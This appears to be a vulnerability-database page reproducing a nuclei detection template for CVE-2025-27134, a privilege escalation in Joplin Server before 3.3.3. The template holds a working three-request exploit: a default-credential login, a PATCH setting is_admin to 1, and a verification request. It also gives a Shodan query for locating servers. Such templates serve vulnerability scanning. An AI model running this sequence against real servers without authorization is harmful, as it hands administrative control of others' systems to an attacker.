Lucene search
K

Joplin 3.3.3 Server - Privilege Escalation

🗓️ 07 Jul 2026 03:01:27Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 27 Views

Privilege escalation vulnerability in Joplin server allows unauthorized admin access, patched in 3.3.3.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2025-27134
30 Apr 202515:48
circl
CNNVD
Joplin 安全漏洞
30 Apr 202500:00
cnnvd
CVE
CVE-2025-27134
30 Apr 202514:55
cve
Cvelist
CVE-2025-27134 Privilege escalation in Joplin server via user patch endpoint
30 Apr 202514:55
cvelist
EUVD
EUVD-2025-14844
3 Oct 202520:07
euvd
NVD
CVE-2025-27134
30 Apr 202515:16
nvd
OSV
CVE-2025-27134 Privilege escalation in Joplin server via user patch endpoint
30 Apr 202514:55
osv
Positive Technologies
PT-2025-18288 · Joplin · Joplin
30 Apr 202500:00
ptsecurity
RedhatCVE
CVE-2025-27134
2 May 202515:11
redhatcve
Vulnrichment
CVE-2025-27134 Privilege escalation in Joplin server via user patch endpoint
30 Apr 202514:55
vulnrichment
Rows per page
id: CVE-2025-27134

info:
  name: Joplin 3.3.3 Server - Privilege Escalation
  author: zonia3000
  severity: high
  description: |
    Joplin is a free, open source note taking and to-do application, which can handle a large number of notes organised into notebooks. Prior to version 3.3.3, a privilege escalation vulnerability exists in the Joplin server, allowing non-admin users to exploit the API endpoint `PATCH /api/users/-id` to set the `is_admin` field to 1. The vulnerability allows malicious low-privileged users to perform administrative actions without proper authorization. This issue has been patched in version 3.3.3.
  impact: |
    Authenticated low-privileged users can escalate their privileges to administrator by setting the is_admin field through the PATCH /api/users endpoint, gaining complete control over the Joplin server.
  remediation: |
    Upgrade to Joplin version 3.3.3 or later that properly restricts the is_admin field modification.
  reference:
    - https://github.com/laurent22/joplin/security/advisories/GHSA-xj67-649m-3p8x
    - https://nvd.nist.gov/vuln/detail/CVE-2025-27134
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2025-27134
    cwe-id: CWE-284
    epss-score: 0.01705
    epss-percentile: 0.74509
    cpe: cpe:2.3:a:joplin_project:joplin:*:*:*:*:*:-:*:*
  metadata:
    verified: true
    vendor: joplin_project
    product: joplin
    framework: "-"
    shodan-query: 'title:"Joplin Server"'
  tags: cve,cve2025,auth,joplin,oss,default-login,vuln

variables:
  username: admin@localhost
  password: admin

http:
  - raw:
      - |
        POST /api/sessions HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
          "email": "{{username}}",
          "password": "{{password}}"
        }

      - |
        PATCH /api/users/{{user_id}} HTTP/1.1
        Host: {{Hostname}}
        Cookie: sessionId={{session_id}}
        Content-Type: application/json

        { "is_admin": 1 }

      - |
        GET /api/users HTTP/1.1
        Host: {{Hostname}}
        Cookie: sessionId={{session_id}}
        Content-Type: application/json

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body_1,"user_id") && contains(body_1,"id")'
          - 'contains(user, "{{user_id}}")'
        condition: and

    extractors:
      - type: json
        part: body_1
        name: user_id
        json:
          - '.user_id'
        internal: true

      - type: json
        part: body_1
        name: session_id
        json:
          - '.id'
        internal: true

      - type: json
        name: user
        part: body_3
        json:
          - '.items[] | select(.is_admin == 1) | .id'
# digest: 490a0046304402204290ffe7e17a8422115e3f52d94725d71b375263ff34b40b44b509567fce811802206ee25e1706678f0a0d9dcb12b2d9ad624cec5d6e6408276a41fc4bd42ea37dd9:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.9Medium risk
Vulners AI Score5.9
CVSS 3.18.8
EPSS0.01705
SSVC
27